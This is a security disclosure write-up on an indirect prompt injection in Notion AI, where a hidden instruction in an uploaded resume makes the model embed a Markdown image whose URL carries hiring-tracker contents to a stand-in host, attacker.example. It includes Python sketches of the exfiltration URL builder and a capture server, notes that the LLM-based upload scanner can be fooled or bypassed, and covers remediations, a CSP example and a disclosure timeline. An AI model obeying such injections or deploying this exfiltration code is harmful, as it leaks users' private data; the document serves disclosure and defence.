Notion AI Data Exfiltration via Indirect Prompt Injection
A flaw in Notion AI's handling of document edits permits indirect prompt injection that forces the system to prepend malicious images to user-generated content. The attack enables an adversary to exfiltrate document data before the user consents to the edit, exposing sensitive hiring-tracker information. Despite a responsible disclosure, Notion dismissed the finding, underscoring the need for stronger safeguards.
Notion AI, which augments documents with natural-language-driven suggestions, suffered a critical vulnerability that allows attackers to exfiltrate client data during the edit process. The flaw is triggered when an uploaded untrusted document, for example a resume PDF, contains a hidden prompt injection. The injection instructs the language model to construct a URL that concatenates all text from the page being edited and points at an attacker-controlled domain. When Notion AI inserts an image into the target hiring-tracker page using this URL as its source, the user's browser fetches the image before the user is prompted to approve the edit.
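As an illustration of the mechanism, the sketch below shows roughly what the injected instructions ask the model to do. The domain `attacker.example`, the endpoint path, and the query parameter `d` are hypothetical stand-ins, not values from the actual report.

```python
from urllib.parse import quote

# Hypothetical attacker endpoint; any domain the attacker controls works.
EXFIL_ENDPOINT = "https://attacker.example/collect"

def build_exfil_url(page_text: str) -> str:
    """Mimic what the injected prompt asks the model to do:
    URL-encode the page contents and append them as a query parameter."""
    return f"{EXFIL_ENDPOINT}?d={quote(page_text)}"

# Illustrative hiring-tracker contents (invented for this sketch).
page_text = "Candidate: J. Doe | Salary expectation: $180k | Feedback: strong hire"
url = build_exfil_url(page_text)

# The model then emits a Markdown image whose source is this URL, e.g.:
#   ![status](https://attacker.example/collect?d=Candidate%3A%20J.%20Doe%20...)
# Rendering that image is what triggers the browser's outbound request.
print(url)
```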
Because the HTTP request to the external domain occurs immediately, the attacker's server captures the full URL, which encodes the entire contents of the hiring-tracker document. In a test scenario, the payload revealed salary expectations, candidate feedback, role specifications, and diversity hiring goals. Accepting or rejecting the edit afterward does not change the fact that the data has already been transmitted.
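On the receiving end, any server that logs incoming request URLs suffices; a plain web server's access log would do. A minimal sketch, assuming the hypothetical `?d=` parameter from the sketch above:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # parse_qs percent-decodes the exfiltrated page text automatically.
        params = parse_qs(urlparse(self.path).query)
        for chunk in params.get("d", []):
            print("Captured:", chunk)
        # Return a minimal response so the image fetch looks unremarkable.
        self.send_response(200)
        self.send_header("Content-Type", "image/png")
        self.end_headers()

if __name__ == "__main__":
    # Port 8080 is arbitrary; this is only a sketch of the capture side.
    HTTPServer(("0.0.0.0", 8080), ExfilHandler).serve_forever()
```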
The attack works even though Notion AI employs a large language model to scan uploads for malicious content. Because that "safe document" check is itself performed by a language model, a carefully crafted prompt injection can convince the scanner that the file is benign. The research deliberately did not focus on bypassing this warning; an attacker could instead sidestep scanning entirely by placing the injection in a source that is not scanned, such as a web page, another Notion page, or an external connector.
Notion Mail's drafting assistant is similarly vulnerable. By embedding a reference to an untrusted Notion page in the draft prompt, an attacker can cause the assistant to render insecure Markdown images that pull content from external URLs, again exfiltrating data via a request issued before the user approves the draft.
### Recommended Remediations for Organizations
1. **Vet and restrict connectors** that can pull in highly sensitive or untrusted data.
   - Settings → Notion AI → Connectors
2. **Disable workspace-wide web search** to prevent automatic fetching from the wider internet.
   - Settings → Notion AI → AI Web Search → Enable web search for workspace → Off
3. **Require confirmation for all external requests**.
   - Settings → Notion AI → AI Web Search → Require confirmation for web requests → On
4. **Avoid including sensitive personal data** in personalization settings.
   - Settings → Notion AI → Personalization
These measures reduce the attack surface but do not eliminate the underlying flaw.
### Recommended Remediations for Notion
1. **Disallow automatic rendering of Markdown images** without explicit user approval in both page creation and email drafts.
2. **Implement a robust Content Security Policy (CSP)** that blocks network requests to unapproved external domains (a minimal sketch follows this list).
3. **Ensure CDN infrastructure** cannot be exploited as an open redirect to bypass the CSP.
4. **Introduce a pre-approval audit trail** to detect when edits occur before user confirmation.
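For remediation 2, the sketch below shows the kind of policy involved, written here as a small Flask app for illustration; the allowlisted hosts are placeholders, not Notion's actual asset domains.

```python
from flask import Flask

app = Flask(__name__)

# Placeholder allowlist of image hosts; anything off-list is blocked.
APPROVED_IMG_SOURCES = "'self' https://*.notion.so https://*.notion-static.com"

@app.after_request
def set_csp(response):
    # img-src confines image fetches (the exfiltration channel above)
    # to approved domains; default-src covers all other request types.
    response.headers["Content-Security-Policy"] = (
        f"default-src 'self'; img-src {APPROVED_IMG_SOURCES}"
    )
    return response

@app.route("/")
def page():
    # With the policy set, an injected image pointing at an off-allowlist
    # host is refused by the browser before any request leaves the machine.
    return '<img src="https://attacker.example/collect?d=...">'

if __name__ == "__main__":
    app.run()
```

Because CSP is enforced by the browser at fetch time, it closes the pre-approval window itself rather than relying on the model to behave.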
### Responsible Disclosure Timeline
- **12/24/2024:** Initial report submitted via HackerOne.
- **12/24/2024:** Report acknowledged; modified write-up requested.
- **12/24/2024:** PromptArmor provided formatted report.
- **12/29/2024:** Report closed as Not Applicable by Notion.
- **01/07/2025:** Public disclosure released.
The incident underscores the importance of rigorous input validation, careful user-approval interaction design, and layered security controls when integrating AI capabilities within collaborative platforms.